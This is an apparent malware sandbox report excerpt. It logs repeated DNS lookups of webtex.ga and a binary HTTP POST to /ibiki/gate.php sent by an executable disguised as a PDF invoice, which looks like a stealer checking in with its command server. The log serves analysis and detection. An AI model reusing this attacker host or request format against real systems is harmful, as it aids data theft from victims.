                                    Dec 3, 2020 10:03:10.656408072 CET8.8.8.8192.168.2.30xb11bNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:11.050388098 CET8.8.8.8192.168.2.30x8a65No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:11.529567957 CET8.8.8.8192.168.2.30x3590No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:11.795329094 CET8.8.8.8192.168.2.30x82c7No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:12.168389082 CET8.8.8.8192.168.2.30x460bNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:12.471132994 CET8.8.8.8192.168.2.30x7c2aNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:12.840190887 CET8.8.8.8192.168.2.30xf60bNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:13.116857052 CET8.8.8.8192.168.2.30x220eNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:13.969163895 CET8.8.8.8192.168.2.30xd70eNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:15.802970886 CET8.8.8.8192.168.2.30x51d9No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:16.248004913 CET8.8.8.8192.168.2.30xf658No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:16.686774969 CET8.8.8.8192.168.2.30xe36dNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:17.101861954 CET8.8.8.8192.168.2.30xf6aNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:17.576236963 CET8.8.8.8192.168.2.30xb93No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:18.257051945 CET8.8.8.8192.168.2.30x663fNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:19.004000902 CET8.8.8.8192.168.2.30x4f9No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:19.347383022 CET8.8.8.8192.168.2.30x6067No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:19.852605104 CET8.8.8.8192.168.2.30xc41fNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:20.141608000 CET8.8.8.8192.168.2.30x67b4No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:20.612430096 CET8.8.8.8192.168.2.30xc411No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:20.892046928 CET8.8.8.8192.168.2.30x135fNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:21.386265039 CET8.8.8.8192.168.2.30x7c7aNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:21.965183020 CET8.8.8.8192.168.2.30x7a9bNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:22.239182949 CET8.8.8.8192.168.2.30x2061No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:22.737561941 CET8.8.8.8192.168.2.30x9a2dNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:23.001060009 CET8.8.8.8192.168.2.30x5736No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:23.506064892 CET8.8.8.8192.168.2.30x2777No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:23.999000072 CET8.8.8.8192.168.2.30x10d0No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:24.656239986 CET8.8.8.8192.168.2.30xb2fcNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:25.160573959 CET8.8.8.8192.168.2.30xf47fNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:25.638206959 CET8.8.8.8192.168.2.30xc2deNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:26.166709900 CET8.8.8.8192.168.2.30x2c89No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:26.777601957 CET8.8.8.8192.168.2.30xec75No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:27.047732115 CET8.8.8.8192.168.2.30x37feNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:27.569431067 CET8.8.8.8192.168.2.30xee9No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:28.079176903 CET8.8.8.8192.168.2.30x268cNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:28.347884893 CET8.8.8.8192.168.2.30xa636No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:28.974086046 CET8.8.8.8192.168.2.30xb2a4No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:29.239267111 CET8.8.8.8192.168.2.30xcf41No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:29.883810997 CET8.8.8.8192.168.2.30x19d2No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:30.455344915 CET8.8.8.8192.168.2.30x4f6bNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:30.967179060 CET8.8.8.8192.168.2.30xe5a7No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:31.238079071 CET8.8.8.8192.168.2.30x22c0No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:31.728187084 CET8.8.8.8192.168.2.30x1998No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:31.992304087 CET8.8.8.8192.168.2.30xbd1bNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:32.580051899 CET8.8.8.8192.168.2.30x5335No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:32.841048956 CET8.8.8.8192.168.2.30x235eNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:33.414453983 CET8.8.8.8192.168.2.30xccc0No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:33.915010929 CET8.8.8.8192.168.2.30xc68eNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:34.424179077 CET8.8.8.8192.168.2.30xdef7No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:34.920726061 CET8.8.8.8192.168.2.30xfaf1No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:35.481955051 CET8.8.8.8192.168.2.30xa930No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:36.018115044 CET8.8.8.8192.168.2.30xea6eNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:36.585150003 CET8.8.8.8192.168.2.30x7bf5No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:37.073591948 CET8.8.8.8192.168.2.30xeb1bNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:37.612159967 CET8.8.8.8192.168.2.30x58c7No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:38.116751909 CET8.8.8.8192.168.2.30x8c94No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:38.593563080 CET8.8.8.8192.168.2.30xf10dNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:39.132040977 CET8.8.8.8192.168.2.30x640dNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:39.660496950 CET8.8.8.8192.168.2.30x2773No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:39.990310907 CET8.8.8.8192.168.2.30x1327No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:40.385514975 CET8.8.8.8192.168.2.30xb392No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:40.670334101 CET8.8.8.8192.168.2.30xd79cNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:40.944808006 CET8.8.8.8192.168.2.30x2d9bNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:41.237742901 CET8.8.8.8192.168.2.30x2b7dNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:41.528228045 CET8.8.8.8192.168.2.30x9e39No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:41.815978050 CET8.8.8.8192.168.2.30xbac6No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:42.105398893 CET8.8.8.8192.168.2.30x91f1No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:42.772661924 CET8.8.8.8192.168.2.30xabc8No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:43.073678017 CET8.8.8.8192.168.2.30x1b62No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:43.386657953 CET8.8.8.8192.168.2.30xef30No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:43.663877010 CET8.8.8.8192.168.2.30xf5dbNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:43.984477043 CET8.8.8.8192.168.2.30x66a8No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:44.374341965 CET8.8.8.8192.168.2.30x3076No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:44.646862984 CET8.8.8.8192.168.2.30xa64fNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:44.947272062 CET8.8.8.8192.168.2.30x18d1No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:45.226454020 CET8.8.8.8192.168.2.30x16fcNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:45.740957022 CET8.8.8.8192.168.2.30xf333No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:46.297924995 CET8.8.8.8192.168.2.30x8a44No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:46.772357941 CET8.8.8.8192.168.2.30x24bdNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:47.294194937 CET8.8.8.8192.168.2.30x44edNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:47.856794119 CET8.8.8.8192.168.2.30xa991No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:48.421653986 CET8.8.8.8192.168.2.30x7ed0No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:48.973506927 CET8.8.8.8192.168.2.30xed25No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:49.368880033 CET8.8.8.8192.168.2.30x1f9bNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:49.680624962 CET8.8.8.8192.168.2.30xdd43No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:50.319664955 CET8.8.8.8192.168.2.30x4dcbNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:50.679482937 CET8.8.8.8192.168.2.30x3c4cNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:51.212004900 CET8.8.8.8192.168.2.30xc3f4No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:51.724632978 CET8.8.8.8192.168.2.30x9b59No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:51.989200115 CET8.8.8.8192.168.2.30x1acaNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:52.518933058 CET8.8.8.8192.168.2.30xcf36No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:53.110177994 CET8.8.8.8192.168.2.30xa9feNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:53.719638109 CET8.8.8.8192.168.2.30xbf15No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:53.991311073 CET8.8.8.8192.168.2.30x86cdNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:54.549211979 CET8.8.8.8192.168.2.30xb35eNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:55.132646084 CET8.8.8.8192.168.2.30xf4fNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:55.829653025 CET8.8.8.8192.168.2.30xa750No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:56.092653990 CET8.8.8.8192.168.2.30x2127No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:56.611583948 CET8.8.8.8192.168.2.30xaf39No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:57.127315044 CET8.8.8.8192.168.2.30x9ef3No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:57.665216923 CET8.8.8.8192.168.2.30x6144No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:58.260405064 CET8.8.8.8192.168.2.30x7360No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:58.526932001 CET8.8.8.8192.168.2.30xc4a6No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:58.794562101 CET8.8.8.8192.168.2.30x3dd1No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:59.076771021 CET8.8.8.8192.168.2.30x5daNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:59.353662014 CET8.8.8.8192.168.2.30x9a3eNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:59.636375904 CET8.8.8.8192.168.2.30x8d7fNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:59.915659904 CET8.8.8.8192.168.2.30x3864No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:00.191922903 CET8.8.8.8192.168.2.30x3309No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:00.484050989 CET8.8.8.8192.168.2.30xf0dbNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:00.766160965 CET8.8.8.8192.168.2.30x4800No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:01.144134998 CET8.8.8.8192.168.2.30x9a8fNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:01.448929071 CET8.8.8.8192.168.2.30x674bNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:01.737176895 CET8.8.8.8192.168.2.30x6b11No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:02.042148113 CET8.8.8.8192.168.2.30xb6d9No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:02.409003019 CET8.8.8.8192.168.2.30xf523No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:02.688880920 CET8.8.8.8192.168.2.30xc521No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:02.969583988 CET8.8.8.8192.168.2.30xd047No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:03.259670019 CET8.8.8.8192.168.2.30x7eb0No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:03.532891989 CET8.8.8.8192.168.2.30xf399No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:03.822348118 CET8.8.8.8192.168.2.30x1a21No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:04.101543903 CET8.8.8.8192.168.2.30xf5b1No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:04.391450882 CET8.8.8.8192.168.2.30xf389No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:04.674464941 CET8.8.8.8192.168.2.30xd7e2No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:04.942394018 CET8.8.8.8192.168.2.30x9e4No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:05.226393938 CET8.8.8.8192.168.2.30xbd95No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:05.510657072 CET8.8.8.8192.168.2.30x5da6No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:05.796542883 CET8.8.8.8192.168.2.30xcb30No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:06.101805925 CET8.8.8.8192.168.2.30x8b25No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:06.380043030 CET8.8.8.8192.168.2.30x181aNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:06.662600994 CET8.8.8.8192.168.2.30x37caNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:06.977004051 CET8.8.8.8192.168.2.30x8014No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:07.251466990 CET8.8.8.8192.168.2.30x38f9No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:07.552763939 CET8.8.8.8192.168.2.30xd334No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:07.835998058 CET8.8.8.8192.168.2.30x7f82No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:08.244343996 CET8.8.8.8192.168.2.30x877No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:08.525451899 CET8.8.8.8192.168.2.30xa0f9No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:08.805875063 CET8.8.8.8192.168.2.30x15b0No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:09.084884882 CET8.8.8.8192.168.2.30x5fccNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:09.352477074 CET8.8.8.8192.168.2.30x99c0No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:09.641357899 CET8.8.8.8192.168.2.30x7e55No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:09.928231001 CET8.8.8.8192.168.2.30x99f5No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:10.217499018 CET8.8.8.8192.168.2.30xa059No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:10.486563921 CET8.8.8.8192.168.2.30x80e6No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:10.763757944 CET8.8.8.8192.168.2.30x29c1No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:11.050237894 CET8.8.8.8192.168.2.30xac48No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:11.417982101 CET8.8.8.8192.168.2.30x9904No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:11.696677923 CET8.8.8.8192.168.2.30x3918No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:11.971090078 CET8.8.8.8192.168.2.30xb0f3No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:12.274544001 CET8.8.8.8192.168.2.30x18e8No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:12.612289906 CET8.8.8.8192.168.2.30x5ef8No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:12.891649008 CET8.8.8.8192.168.2.30x7295No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:13.171314955 CET8.8.8.8192.168.2.30x938aNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:13.482465029 CET8.8.8.8192.168.2.30x33f4No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:13.800709963 CET8.8.8.8192.168.2.30x2cb5No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:14.097882986 CET8.8.8.8192.168.2.30xcfa8No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:14.383955002 CET8.8.8.8192.168.2.30x6ed3No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:14.670947075 CET8.8.8.8192.168.2.30x311aNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:14.937441111 CET8.8.8.8192.168.2.30x4c98No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:15.214709044 CET8.8.8.8192.168.2.30x82a5No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:15.492562056 CET8.8.8.8192.168.2.30x1bb4No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:15.769968987 CET8.8.8.8192.168.2.30xc751No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:16.049843073 CET8.8.8.8192.168.2.30x693fNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:16.544792891 CET8.8.8.8192.168.2.30xaae8No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:16.847960949 CET8.8.8.8192.168.2.30x6eaNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:17.139122009 CET8.8.8.8192.168.2.30xdaf3No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:17.860759974 CET8.8.8.8192.168.2.30x6912No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:18.159993887 CET8.8.8.8192.168.2.30xbb4No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:19.942914009 CET8.8.8.8192.168.2.30x48f0No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:20.253314972 CET8.8.8.8192.168.2.30x58ebNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:20.528146982 CET8.8.8.8192.168.2.30x58e2No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:20.830697060 CET8.8.8.8192.168.2.30xfb15No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:21.274955034 CET8.8.8.8192.168.2.30xfcddNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:21.554297924 CET8.8.8.8192.168.2.30xe84cNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:21.880640030 CET8.8.8.8192.168.2.30xaff7No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:22.148855925 CET8.8.8.8192.168.2.30xbb16No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:22.421103954 CET8.8.8.8192.168.2.30x7419No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:22.746226072 CET8.8.8.8192.168.2.30x1e85No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:23.007875919 CET8.8.8.8192.168.2.30x1d6fNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:23.281064034 CET8.8.8.8192.168.2.30x4e1cNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:23.568725109 CET8.8.8.8192.168.2.30xbd95No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:23.843622923 CET8.8.8.8192.168.2.30x617aNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:24.133373022 CET8.8.8.8192.168.2.30xc7ceNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:24.422159910 CET8.8.8.8192.168.2.30x35d2No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:24.713453054 CET8.8.8.8192.168.2.30x98b3No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:25.332806110 CET8.8.8.8192.168.2.30xbedcNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:25.756966114 CET8.8.8.8192.168.2.30x908bNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)

                                    HTTP Request Dependency Graph

                                    • webtex.ga

                                    HTTP Packets

                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    0192.168.2.34970947.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:28.939497948 CET64OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 190
                                    Connection: close
                                    Dec 3, 2020 10:02:29.004054070 CET65INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:46 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 15
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    1192.168.2.34971047.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
